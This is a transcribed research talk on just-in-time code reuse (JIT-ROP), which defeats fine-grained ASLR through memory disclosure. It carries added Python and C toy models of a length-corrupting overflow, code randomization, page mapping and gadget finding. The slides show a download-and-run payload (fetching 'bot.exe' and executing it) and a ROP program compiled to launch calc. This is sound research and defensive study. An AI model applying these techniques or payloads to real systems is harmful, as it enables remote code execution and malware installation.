Just-in-Time Code Reuse The more things change, the more they stay - - PowerPoint PPT Presentation



SLIDE 1

Just-in-Time Code Reuse

The more things change, the more they stay the same

Kevin Z. Snow¹, Luca Davi², A. Dmitrienko², C. Liebchen², F. Monrose¹, A.-R. Sadeghi²

¹ Department of Computer Science, University of North Carolina at Chapel Hill

² CASED/Technische Universität Darmstadt, Germany

Thursday, August 1, 13

SLIDES 2-9

The Big Picture

  • Large attack surface
  • Scripting facilitates attacks
  • Exploit packs automate increasingly complex attacks
  • Adversary must apply a code-reuse strategy: Return-Oriented Programming

SLIDES 10-23

Basic ROP Attack Technique

Figure (animated): the Adversary and the victim's program memory: Stack (Stack Var 1, Stack Var 2, with SP marking the stack pointer), Heap, and Code containing short instruction sequences that each end in RET (Stack Pivot; LOAD Gadget; ADD Gadget). The animation labels the steps in order:

  1. Inject ROP Payload: the adversary places RET Address 1, RET Address 2 and RET Address 3 on the heap.
  2. Heap Vulnerability: a flaw in the handling of heap data is triggered.
  3. Exploit Vulnerability to Launch ROP Payload: control reaches the stack pivot, SP is moved onto the injected return addresses, and each RET then transfers control to the next instruction sequence.

SLIDES 24-31

Code Reuse Attacks History

selected, not exhaustive

  • 1997: ret2libc, Solar Designer
  • 2001: Advanced ret2libc, Nergal
  • 2005: Borrowed Code Chunks Exploitation, Krahmer
  • 2007: ROP, Shacham (CCS)
  • 2008: ROP, Shacham (BlackHat USA); ROP on SPARC, Buchanan et al. (CCS); ROP on Atmel, Francillon et al. (CCS)
  • 2009: ROP Rootkits, Hund et al. (USENIX); ROP on PowerPC, FX Lindner (BlackHat USA); ROP on ARM/iOS, Miller et al. (BlackHat USA)
  • 2010: ROP without Returns, Checkoway et al. (CCS); Roppery, Iozzo et al. (BlackHat USA); Payload already inside, Long Le (BlackHat USA); Pwn2Own iPhone, Weinmann & Iozzo; Pwn2Own IE, Nils; Practical ROP, Zovi (RSA Conference)

SLIDE 32

ASLR – Address Space Layout Randomization

SLIDES 33-35

Basics of ASLR

  • ASLR randomizes the base address of code/data segments

Figure: Program Memory (abstract) for Application Run 1 and Application Run 2, each containing the Executable, a Library (e.g., user32.dll), the Heap and the Stack; the segments sit at different base addresses in the two runs.

Disclosure Attack, e.g., [Sotirov et al., Blackhat 2008]:

  1. Exploit disclosure vulnerability
  2. Leak function pointer
  3. Adjust instruction sequence pointers

SLIDES 36-39

Example Memory Disclosure

Figure: Program Memory (abstract) with Stack, Executable, Library (e.g., user32.dll) and the Heap. On the heap lie a JavaScript String (a size field followed by the string data), a Vulnerable Object (array vuln[10]) and an Object holding a funcPointer. The animation shows the overflow write AAAAAAAAAAAAAAAAA running past vuln[10] and setting the string's size field to MAX_SIZE, after which the memory beyond the string, including the funcPointer, becomes "Memory Readable as String Data".

See [Serna, Blackhat USA 2012] for more memory disclosure tactics.
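The overflow on these slides, modelled as an added Python example (not code from the talk or from the JIT-ROP project): a byte array stands in for the heap, with vuln[10] laid out directly before a string's 4-byte size field, so an unchecked write to index 10 sets the size to MAX_SIZE and the trusting read then returns the neighbouring object's funcPointer as string data. The layout, the 4-byte slot size and the 0x77D1ABCD pointer value are constructed for illustration; the bounds-checked write and the capacity-validated read are the two mitigations a defender would want in the engine.

```python
import struct

SLOT = 4                                  # each vuln[] element is 4 bytes (constructed)
VULN_LEN = 10                             # array vuln[10] from the slide
STRING_OFF = VULN_LEN * SLOT              # string header sits right after vuln[]
DATA_OFF = STRING_OFF + SLOT              # string data follows the 4-byte size field
MAX_SIZE = 0xFFFFFFFF                     # the value the overflow writes into size


def make_heap(text: bytes, neighbour: bytes) -> bytearray:
    """Lay out: vuln[10] (zeroed) | size | text | neighbouring object bytes."""
    heap = bytearray(VULN_LEN * SLOT)
    heap += struct.pack("<I", len(text)) + text
    heap += neighbour                     # e.g. the next object's funcPointer
    return heap


def vuln_write_unchecked(heap: bytearray, index: int, value: int) -> None:
    """The bug: no bounds check, so vuln[10] lands on the string's size field."""
    off = index * SLOT
    heap[off:off + SLOT] = struct.pack("<I", value)


def vuln_write_checked(heap: bytearray, index: int, value: int) -> None:
    """Hardened write: reject any index outside vuln[0..9]."""
    if not 0 <= index < VULN_LEN:
        raise IndexError(f"vuln[{index}] is out of bounds")
    vuln_write_unchecked(heap, index, value)


def string_size(heap: bytearray) -> int:
    return struct.unpack_from("<I", heap, STRING_OFF)[0]


def string_read(heap: bytearray) -> bytes:
    """What the script engine hands back to JavaScript: `size` bytes from the
    data field, trusting the size field completely."""
    return bytes(heap[DATA_OFF:DATA_OFF + string_size(heap)])


def string_read_validated(heap: bytearray, capacity: int) -> bytes:
    """Defensive read: a size field larger than the allocation means the
    header was corrupted, so refuse to read rather than leak memory."""
    size = string_size(heap)
    if size > capacity:
        raise ValueError("string size exceeds allocation capacity")
    return bytes(heap[DATA_OFF:DATA_OFF + size])


def demo() -> dict:
    func_ptr = struct.pack("<I", 0x77D1ABCD)       # constructed funcPointer value
    heap = make_heap(b"hello", func_ptr)
    result = {"before": string_read(heap)}

    # 1. the checked write refuses the out-of-bounds index
    try:
        vuln_write_checked(heap, VULN_LEN, MAX_SIZE)
        result["checked_rejected"] = False
    except IndexError:
        result["checked_rejected"] = True

    # 2. the unchecked write corrupts the size field
    vuln_write_unchecked(heap, VULN_LEN, MAX_SIZE)
    result["size_after"] = string_size(heap)
    result["after"] = string_read(heap)            # now spills into the neighbour

    # 3. validating size against the allocation catches the corruption
    try:
        string_read_validated(heap, capacity=len(b"hello"))
        result["validated_rejected"] = False
    except ValueError:
        result["validated_rejected"] = True
    return result


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The validated read only closes the read path; the bounds check on the write is the fix for the bug itself, and the value in "after" shows why the slide calls a corrupted length field a disclosure primitive rather than a crash.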

SLIDE 40

Tackling the Problems of ASLR via Fine-Grained ASLR

SLIDES 41-42

Basics of Fine-grained ASLR

Figure: the Library (e.g., user32.dll) in Application Run 1 holds Instruction Sequence 3, Instruction Sequence 2 and Instruction Sequence 1 (each ending in RET); in Application Run 2 the same library holds them in the order 2, 1, 3, so the sequences move relative to each other and not only relative to a common base.

  • Different fine-grained ASLR approaches have been proposed recently:
    • ORP [Pappas et al., IEEE Security & Privacy 2012]
    • ILR [Hiser et al., IEEE Security & Privacy 2012]
    • STIR [Wartell et al., ACM CCS 2012]
    • XIFER [Davi et al., ASIACCS 2013]
  • All mitigate single memory disclosure attacks

SLIDES 43-48

Inner Basic Block Randomization

[Pappas et al., IEEE S&P 2012]

  • Instruction Reordering
  • Instruction Substitution
  • Register Re-Allocation (in case another register is free to use)

Instruction Reordering. Original: MOV EAX, &string; MOV EBX, &ptr. Randomized: MOV EBX, &ptr; MOV EAX, &string.

Instruction Substitution. Original: MOV EBX, $0. Randomized: XOR EBX, EBX.

Register Re-Allocation. Original: CALL *EAX; MOV EAX, &ptr. Randomized: CALL *EBX; MOV EBX, &ptr.

SLIDES 49-58

Basic Block Randomization

[Wartell et al., ACM CCS 2012; Davi et al. AsiaCCS 2013]

Original:

BBL_1: MOV EBX, EAX; CALL 0x10FF
BBL_2: MOV (ESP), EAX; RET
0x10FF: BBL_3: ADD EAX, ECX; RET

Randomized (the basic blocks are permuted, the CALL target is rewritten to BBL_3's new address, and a JMP is appended to BBL_1 to preserve its fall-through into BBL_2):

0x1000: BBL_2: MOV (ESP), EAX; RET
0x10A0: BBL_3: ADD EAX, ECX; RET
0x10FF: BBL_1: MOV EBX, EAX; CALL 0x10A0; JMP 0x1000
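The block permutation on these slides, carried through as an added Python example (not STIR or XIFER code and not code from the talk): the three blocks are placed in a chosen order, a JMP is appended wherever a fall-through successor is no longer adjacent, and symbolic CALL/JMP targets are patched to the new addresses. The fixed 5-byte instruction size, the 0x1000 base and the symbolic encoding of targets are assumptions. The last function enumerates all six layouts to show what the slide's mitigation claim means in practice: the distance from a leaked BBL_1 entry to the ADD gadget is not constant, so a single leaked pointer plus precomputed offsets no longer locates the gadget.

```python
from itertools import permutations
import random

# The slide's program, constructed in symbolic form: direct CALL/JMP targets
# name a block and are rewritten to addresses once the blocks are placed.
PROGRAM = {
    "BBL_1": ["MOV EBX, EAX", "CALL BBL_3"],     # falls through into BBL_2
    "BBL_2": ["MOV (ESP), EAX", "RET"],
    "BBL_3": ["ADD EAX, ECX", "RET"],
}
ORIGINAL_ORDER = ["BBL_1", "BBL_2", "BBL_3"]
INSN_SIZE = 5          # toy: every instruction is 5 bytes (assumption)
BASE = 0x1000


def falls_through(body):
    """A block reaches its successor implicitly unless it ends in RET or JMP."""
    return body[-1].split()[0] not in ("RET", "JMP")


def layout(program, original, placed, base=BASE):
    """Place the blocks in `placed` order. Returns (block -> address,
    address -> instruction). A JMP is appended wherever a fall-through
    successor is no longer adjacent, and CALL/JMP targets are patched."""
    successor = {b: (original[i + 1] if i + 1 < len(original) else None)
                 for i, b in enumerate(original)}
    bodies = {}
    for i, name in enumerate(placed):
        body = list(program[name])
        nxt = placed[i + 1] if i + 1 < len(placed) else None
        if falls_through(body) and successor[name] and successor[name] != nxt:
            body.append(f"JMP {successor[name]}")
        bodies[name] = body
    addresses, addr = {}, base
    for name in placed:
        addresses[name] = addr
        addr += len(bodies[name]) * INSN_SIZE
    image = {}
    for name in placed:
        for k, insn in enumerate(bodies[name]):
            op, _, target = insn.partition(" ")
            if op in ("CALL", "JMP") and target in addresses:
                insn = f"{op} 0x{addresses[target]:04X}"
            image[addresses[name] + k * INSN_SIZE] = insn
    return addresses, image


def random_layout(program, original, seed, base=BASE):
    """One randomized run: shuffle the block order, then lay it out."""
    placed = list(original)
    random.Random(seed).shuffle(placed)
    return layout(program, original, placed, base)


def gadget_offset(addresses, image, leaked_block, gadget_insn):
    """Distance from a leaked block entry (think: a leaked function pointer)
    to the first occurrence of `gadget_insn` in the image."""
    gadget_addr = min(a for a, insn in image.items() if insn == gadget_insn)
    return gadget_addr - addresses[leaked_block]


def offsets_over_all_layouts(program, original, leaked_block, gadget_insn):
    """Every offset an adversary holding one leaked pointer might face."""
    return sorted({gadget_offset(*layout(program, original, list(p)), leaked_block, gadget_insn)
                   for p in permutations(original)})


def dump(image):
    return "\n".join(f"0x{a:04X}: {insn}" for a, insn in sorted(image.items()))


if __name__ == "__main__":
    addrs, img = layout(PROGRAM, ORIGINAL_ORDER, ["BBL_2", "BBL_3", "BBL_1"])
    print(dump(img))
    print("offsets BBL_1 -> ADD gadget across all layouts:",
          offsets_over_all_layouts(PROGRAM, ORIGINAL_ORDER, "BBL_1", "ADD EAX, ECX"))
```

Under base-only ASLR the offset would be 20 in every run; with the blocks permuted it takes one of four values, and the trailing JMP that keeps BBL_1 correct is also what makes the block sizes, and so the offsets, layout-dependent.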

SLIDES 59-61

Instruction Location Randomization

[Hiser et al., IEEE S&P 2012]

Original:

MOV EBX, EAX; CALL 0x10FF; MOV (ESP), EAX; RET
0x10FF: ADD EAX, ECX; RET

Randomized (every instruction is placed at its own address; the CALL target is rewritten accordingly):

0x2500: MOV EBX, EAX
0x2000: CALL 0x3000
0x1000: MOV (ESP), EAX
0x12A0: RET
0x3000: ADD EAX, ECX
0x1F00: RET

Fall-through map: 0x2500 -> 0x2000, 0x2000 -> 0x1000, 0x1000 -> 0x12A0, 0x3000 -> 0x1F00

Execution is driven by a fall-through map and a binary translation framework (Strata).
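The fall-through map on this slide, reproduced and exercised in an added Python example (not ILR or Strata code and not code from the talk): each instruction is given an address (the slide's own addresses, a linear layout, or a seeded random one), the map records which address originally followed which, and a small executor that sequences only through the map shows that all three layouts run the same instruction stream. CALL targets are encoded as instruction indices and the 5-byte instruction size is an assumption. The last function counts how many original successors are still physically adjacent, which is what a linear disassembly from a leaked address would recover.

```python
import random

# Constructed program in the slide's shape. CALL targets are instruction
# indices so the program can be laid out anywhere.
PROGRAM = [
    "MOV EBX, EAX",
    "CALL 4",             # the ADD EAX, ECX; RET sequence lives at index 4
    "MOV (ESP), EAX",
    "RET",
    "ADD EAX, ECX",
    "RET",
]
INSN_SIZE = 5            # toy: fixed instruction size (assumption)

# Addresses read off the slide: instruction i sits at SLIDE_LAYOUT[i].
SLIDE_LAYOUT = [0x2500, 0x2000, 0x1000, 0x12A0, 0x3000, 0x1F00]


def linear_layout(program, base=0x1000):
    """Conventional placement: instruction i at base + i*INSN_SIZE."""
    return [base + i * INSN_SIZE for i in range(len(program))]


def ilr_layout(program, seed, lo=0x1000, hi=0x3000):
    """ILR-style placement: each instruction at its own random address."""
    rng = random.Random(seed)
    return rng.sample(range(lo, hi, INSN_SIZE), len(program))


def fallthrough_map(program, addrs):
    """address -> address of the instruction that originally followed it.
    RET has no fall-through, so it gets no entry (as on the slide)."""
    return {addrs[i]: addrs[i + 1]
            for i in range(len(program) - 1) if program[i] != "RET"}


def execute(program, addrs, max_steps=50):
    """Run the program using only the fall-through map for sequencing:
    CALL pushes the mapped successor as return address, RET pops it.
    Returns the original instruction indices in execution order."""
    ft = fallthrough_map(program, addrs)
    index_at = {a: i for i, a in enumerate(addrs)}
    pc, stack, trace = addrs[0], [], []
    while pc is not None and len(trace) < max_steps:
        i = index_at[pc]
        trace.append(i)
        op, _, arg = program[i].partition(" ")
        if op == "CALL":
            stack.append(ft[pc])
            pc = addrs[int(arg)]
        elif op == "RET":
            pc = stack.pop() if stack else None
        else:
            pc = ft.get(pc)
    return trace


def adjacent_successors(program, addrs):
    """How many original successors still sit INSN_SIZE bytes after their
    predecessor, i.e. how much of the order a linear sweep from a leaked
    address would recover."""
    return sum(1 for i in range(len(program) - 1)
               if addrs[i + 1] == addrs[i] + INSN_SIZE)


if __name__ == "__main__":
    print("fall-through map from the slide:",
          {hex(k): hex(v) for k, v in fallthrough_map(PROGRAM, SLIDE_LAYOUT).items()})
    for name, addrs in (("linear", linear_layout(PROGRAM)),
                        ("slide", SLIDE_LAYOUT),
                        ("ilr(seed=7)", ilr_layout(PROGRAM, 7))):
        print(name, execute(PROGRAM, addrs), "adjacent:", adjacent_successors(PROGRAM, addrs))
```

The executor is the invariant that ILR's binary translator has to maintain: as long as every instruction consults the map instead of pc + length, the program's behaviour does not depend on where its instructions sit, which is exactly why the map itself becomes a secret worth protecting.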

SLIDE 62

Does Fine-Grained ASLR Provide a Viable Defense in the Long Run?

SLIDES 63-66

Contributions

  1. A novel attack class that undermines fine-grained ASLR, dubbed just-in-time code reuse
  2. We show that memory disclosures are far more damaging than previously believed
  3. A prototype exploit framework that demonstrates one instantiation of our idea, called JIT-ROP

SLIDES 67-71

Assumptions

Defender:
  • Non-Executable Stack and Heap
  • Fine-Grained ASLR

Adversary:
  • Memory Disclosure Vulnerability
  • Control-Flow Vulnerability

SLIDES 72-80

Workflow of Just-In-Time Code Reuse

Figure: the Adversary supplies an Exploit Description (High-Level Language) and a Vulnerable Application; the JIT-ROP Framework then runs the following steps, the output of each feeding the next:

  1. Leak Code Pointer
  2. Map Memory
  3. Find ROP Sequences (Gadgets)
  4. Find API Functions
  5. Compile ROP Program

SLIDES 81-85

Challenges

  • Map memory without crashing
  • Find gadgets, APIs, and compile payload dynamically at runtime
  • Fully automated
  • Demonstrate efficient, practical exploit

SLIDES 86-90

Our Approach: Map Memory

(Steps: Map Memory, Find Gadgets, Find API Calls, JIT Compile)

  • Observation: a single leaked function pointer means an entire code page is present

Figure: the initial code page, first as raw bytes (f295afcad42b43 638b2bbf6381ff 72efc88bda4cc0 0732bba1575ccb eb7c025e6b8ad3 0c283baa9f03e4 7464fc814176cd 546bcee28e4232), then disassembled:

... push 0x1; call [-0xFEED]; mov ebx, eax; jmp +0xBEEF; dec ecx; xor ebx, ebx ...

The animation then adds further code pages reached from the first one; the repeated page listings in the extraction are those additional pages.

SLIDES 91-96

Our Approach: Find API Calls

Desired Payload:

URLDownloadToFile("http://...", "bot.exe"); WinExec("bot.exe"); ExitProcess(1);

Code Page Previously Found in the Vulnerable Application references: Sleep(...), FindWindow(...), GetActiveWindow(...)

  • needed APIs often not referenced by program
  • dynamic library and function loading is common
  • solution: scan for LoadLibrary and GetProcAddress references instead (the figure marks the LoadLibrary("library.dll"), GetProcAddress("func1") and GetProcAddress("func2") call sites on the found pages)

With Dynamic Loading:

LoadLibrary("urlmon.dll"); GetProcAddress(@, "URLDownloadToFile"); @("http://...", "bot.exe"); LoadLibrary("kernel32.dll"); GetProcAddress(@, "WinExec"); @("bot.exe"); ...

SLIDES 97-105

Our Approach: Find Gadgets

Figure: the code pages found during memory mapping (each showing ... push 0x1; call [-0xFEED]; mov ebx, eax; jmp +0xBEEF; dec ecx; xor ebx, ebx ...) are scanned into code sequences with the Galileo Algorithm [Shacham, ACM CCS 2007]:

  • mov ebx, eax; ret
  • mov [ecx], eax; pop eax; ret
  • mov ebx, edx; pop eax; ret
  • mov eax, 0x14; ret
  • ...

The sequences are matched against gadget types (MovRegG, JumpG, ArithmeticG, LoadRegG, ...): the animation labels the sequence mov ebx, eax; ret as MovRegG and mov ebx, edx; pop eax; ret as LoadRegG, while sequences that match no type drop out of the set of gadgets found.

SLIDES 106-111

Compiling the ROP program

Gadgets available: JumpG, LoadRegG, MovRegG, ...

Our high-level language:

LoadLibrary("kernel32"); GetProcAddress(@, "WinExec"); @("calc", SW_SHOWNORMAL); LoadLibrary("kernel32"); GetProcAddress(@, "ExitProcess"); @(1);

  1. Generate possible gadget arrangements (Gadget 1 ... Gadget 6, ...)
  2. Fulfill with available gadgets
  3. Serialize

Reimplementation of Q gadget compiler algorithms [Schwartz et al., USENIX 2011] extended for multiple program statements and function parameters.

SLIDE 112

Take it to the Next Level

JIT-ROP is only our initial prototype of just-in-time code reuse.

Potential Improvements:

Run Time (Map Memory, Find Gadgets, Find API Calls):
  • Optimize code throughout.
  • Lower conservativeness at expense of complexity.
  • Explore direct use of system calls.
  • Improve ability to discern code from embedded data.

Compile:
  • Define more composite gadgets implementing an operation.
  • Bigger changes: apply JIT code reuse to jump-oriented programming, return-less ROP, or ret-to-libc styles of code reuse.

slide-113
SLIDE 113

Page Mapping Considerations

All other steps depend on the ability to map code pages well.

Assume only one code pointer is initially accessible (e.g. from a virtual table entry, callback, or event handler).
  • Are there enough function pointers on the heap?
  • Are code pages interconnected enough?

Tested on 7 applications.
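As an added example, not the authors' code, here is a C model of the Map Memory and Find Gadgets steps run over a constructed four-page code region. Starting from a single leaked code pointer, it linearly disassembles only pages already known to be disclosed, learns further pages from direct call/jmp rel32 targets, and then classifies gadgets by the bytes preceding each 'ret' (plus 'jmp r32' for jump gadgets). The region base address and page contents are constructed, and the instruction-length decoder knows only the handful of opcodes those pages contain; a real implementation uses a full x86 disassembler.

```c
#include <stdint.h>
#include <string.h>
#include <stdio.h>

#define PAGE   4096u
#define NPAGES 4
#define BASE   0x10000000u   /* assumed load address of the constructed code region */

/* Constructed code pages: NOP-filled with hand-assembled x86-32 sequences. Page 3 is never a
   direct-branch target, so a mapper that only reads disclosed memory must never see its gadgets. */
static uint8_t mem[NPAGES * PAGE];
static int mapped[NPAGES];

enum { G_JUMP, G_PIVOT, G_LOADREG, G_LOAD, G_STORE, G_TYPES };
static const char *gname[G_TYPES] = { "jump", "pivot", "loadreg", "load", "store" };

static void put(uint32_t va, const uint8_t *b, size_t n) { memcpy(mem + (va - BASE), b, n); }
static void put_branch(uint32_t va, uint8_t opc, uint32_t target) {   /* E8 call rel32 / E9 jmp rel32 */
    uint32_t r = target - (va + 5);
    uint8_t b[5] = { opc, (uint8_t)r, (uint8_t)(r >> 8), (uint8_t)(r >> 16), (uint8_t)(r >> 24) };
    put(va, b, 5);
}

void build_memory(void) {
    memset(mem, 0x90, sizeof mem);
    put(BASE + 0x100, (const uint8_t[]){ 0x55, 0x8B, 0xEC }, 3);           /* push ebp ; mov ebp,esp */
    put_branch(BASE + 0x103, 0xE8, BASE + PAGE + 0x40);                     /* call -> page 1         */
    put(BASE + 0x108, (const uint8_t[]){ 0x5D, 0xC3 }, 2);                 /* pop ebp ; ret          */
    put_branch(BASE + 0x200, 0xE9, BASE + 2 * PAGE + 0x80);                 /* jmp  -> page 2         */
    put(BASE + PAGE + 0x40, (const uint8_t[]){ 0x58, 0xC3 }, 2);           /* pop eax ; ret          */
    put(BASE + PAGE + 0x50, (const uint8_t[]){ 0x94, 0xC3 }, 2);           /* xchg eax,esp ; ret     */
    put(BASE + PAGE + 0x60, (const uint8_t[]){ 0x8B, 0x00, 0xC3 }, 3);     /* mov eax,[eax] ; ret    */
    put_branch(BASE + PAGE + 0x70, 0xE8, BASE + 2 * PAGE + 0x10);           /* call -> page 2         */
    put(BASE + 2 * PAGE + 0x10, (const uint8_t[]){ 0x89, 0x01, 0xC3 }, 3); /* mov [ecx],eax ; ret    */
    put(BASE + 2 * PAGE + 0x80, (const uint8_t[]){ 0xFF, 0xE0 }, 2);       /* jmp eax                */
    put(BASE + 2 * PAGE + 0x90, (const uint8_t[]){ 0x5A, 0xC3 }, 2);       /* pop edx ; ret          */
    put(BASE + 3 * PAGE + 0x20, (const uint8_t[]){ 0x59, 0xC3 }, 2);       /* pop ecx ; ret (never disclosed) */
}

/* Length decoder for just the opcodes above; the real tool uses a full x86 disassembler. */
static uint32_t insn_len(const uint8_t *p) {
    if (p[0] == 0xE8 || p[0] == 0xE9) return 5;                 /* call/jmp rel32                  */
    if (p[0] == 0x8B || p[0] == 0x89 || p[0] == 0xFF) return 2; /* the mov forms used here, jmp r32 */
    return 1;                                                   /* ret, push/pop, xchg, nop        */
}

/* Map Memory: breadth-first over pages from one leaked pointer. A page is read only once it is
   known to be mapped; new pages are learned from direct branch targets, never by blind probing. */
int map_pages(uint32_t start_ptr) {
    int queue[NPAGES], head = 0, tail = 0;
    memset(mapped, 0, sizeof mapped);
    if (start_ptr < BASE || start_ptr >= BASE + NPAGES * PAGE) return 0;
    queue[tail++] = (int)((start_ptr - BASE) / PAGE);
    mapped[queue[0]] = 1;
    while (head < tail) {
        uint32_t ip = BASE + (uint32_t)queue[head++] * PAGE, end = ip + PAGE;
        while (ip < end) {
            const uint8_t *p = mem + (ip - BASE);
            uint32_t len = insn_len(p);
            if (ip + len > end) break;                           /* would cross into undisclosed memory */
            if (p[0] == 0xE8 || p[0] == 0xE9) {
                uint32_t rel = p[1] | (uint32_t)p[2] << 8 | (uint32_t)p[3] << 16 | (uint32_t)p[4] << 24;
                uint32_t tgt = ip + 5 + rel;                     /* unsigned wrap handles negative rel32 */
                if (tgt >= BASE && tgt < BASE + NPAGES * PAGE) {
                    int tp = (int)((tgt - BASE) / PAGE);
                    if (!mapped[tp]) { mapped[tp] = 1; queue[tail++] = tp; }
                }
            }
            ip += len;
        }
    }
    return tail;
}

/* Find Gadgets: classify by the bytes just before each 'ret' (plus 'jmp r32'), looking only at
   mapped pages and never at bytes before a page's start. */
void find_gadgets(int counts[G_TYPES]) {
    memset(counts, 0, sizeof(int) * G_TYPES);
    for (int pg = 0; pg < NPAGES; pg++) {
        if (!mapped[pg]) continue;
        const uint8_t *p = mem + pg * PAGE;
        for (uint32_t i = 0; i < PAGE; i++) {
            if (p[i] == 0xFF && i + 1 < PAGE && (p[i + 1] & 0xF8) == 0xE0) counts[G_JUMP]++; /* jmp r32 */
            if (p[i] != 0xC3) continue;
            if (i >= 1 && (p[i - 1] & 0xF8) == 0x58)                 counts[G_LOADREG]++; /* pop r32 ; ret       */
            else if (i >= 1 && p[i - 1] == 0x94)                     counts[G_PIVOT]++;   /* xchg eax,esp ; ret  */
            else if (i >= 2 && p[i - 2] == 0x8B && p[i - 1] == 0x00) counts[G_LOAD]++;    /* mov eax,[eax] ; ret */
            else if (i >= 2 && p[i - 2] == 0x89 && p[i - 1] == 0x01) counts[G_STORE]++;   /* mov [ecx],eax ; ret */
        }
    }
}

/* Both steps from a single leaked pointer (e.g. a vtable entry pointing into page 0). */
int demo(int counts[G_TYPES]) {
    build_memory();
    int n = map_pages(BASE + 0x100);
    find_gadgets(counts);
    return n;
}

int main(void) {
    int c[G_TYPES], n = demo(c);
    printf("mapped %d of %d pages from one code pointer\n", n, NPAGES);
    for (int t = 0; t < G_TYPES; t++) printf("  %-8s %d\n", gname[t], c[t]);
    return 0;
}
```

Page 3 contains a usable 'pop ecx ; ret', but no disclosed page branches to it, so it is never read and never reported; that restraint is what lets the mapper run inside a process with guard pages and unmapped holes without faulting, and it is also why the "are code pages interconnected enough?" question above decides how much of the address space a single pointer can reach.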

slide-117
SLIDE 117

Experiment Design

For each application:
  • Open the application with a blank document.
  • Save snapshots of program memory.
  • Build a native x86 version of JIT-ROP.
  • Run Map Memory, Find Gadgets, Find API Calls and Compile on each snapshot.
  • Use only one initial code pointer to kick off memory mapping; repeat for all possible initializations.

slide-118
SLIDE 118

Experimental Results: Map Memory

Box plot per application: pages harvested from a single initial code pointer (lower quartile, median, upper quartile; y-axis 100 to 500 pages).

On average, 300 pages of code harvested.

slide-119
SLIDE 119

Experimental Results: Find API Calls

Box plot per application: number of GetProcAddress() and LoadLibrary() call sites found (ASCII or UNICODE variants; median, upper quartile; y-axis 5 to 15).

Find 9 to 12 on average, but only one is needed. Using the LoadLibrary() and GetProcAddress() APIs, the generated ROP payload can look up any other APIs needed. Similar results for all applications.

slide-120
SLIDE 120

Experimental Results: Find Gadgets

Box plot per gadget type (jump, pivot, mvreg, arith, load, store, arithld, arithsto): gadgets found (lower quartile, median, upper quartile; y-axis 50 to 150). Again, similar results for all applications.

Usually find one or more of each gadget type.

We only consider 'xchg eax,esp' for a stack pivot; this could be improved. Also tested against gadget elimination, e.g. ORP [Pappas et al., IEEE S&P 2012], which had little benefit: some gadgets vanished, while new gadgets appeared.

slide-121
SLIDE 121

Experimental Results: Run Time

Bar chart: seconds to exploit (y-axis 7.5 to 22.5) for end-to-end live exploitation experiments with different environments and vulnerabilities (chart labels include CVE-2012-1876, string size overwrite, format string disclosure, V8).

Varies, but viable for real-world exploitation.

slide-122
SLIDE 122

Live Demo: CVE-2013-2551

Credits
  • Vulnerability discovery: Nicolas Joly
  • Metasploit module for Win7/IE8: Juan Vazquez

slide-123
SLIDE 123

Conclusion

Fine-grained ASLR
  • not sufficient against an adversary with the ability to bypass standard ASLR via memory disclosure

Quick Fix?
  • re-randomize periodically [Giuffrida et al., USENIX 2012]
  • performance trade-off is impractical

Towards More Comprehensive Mitigations
  • control-flow integrity [Abadi et al., CCS 2005]

Need for Practical Solutions
  • work towards efficient fine-grained CFI/DFI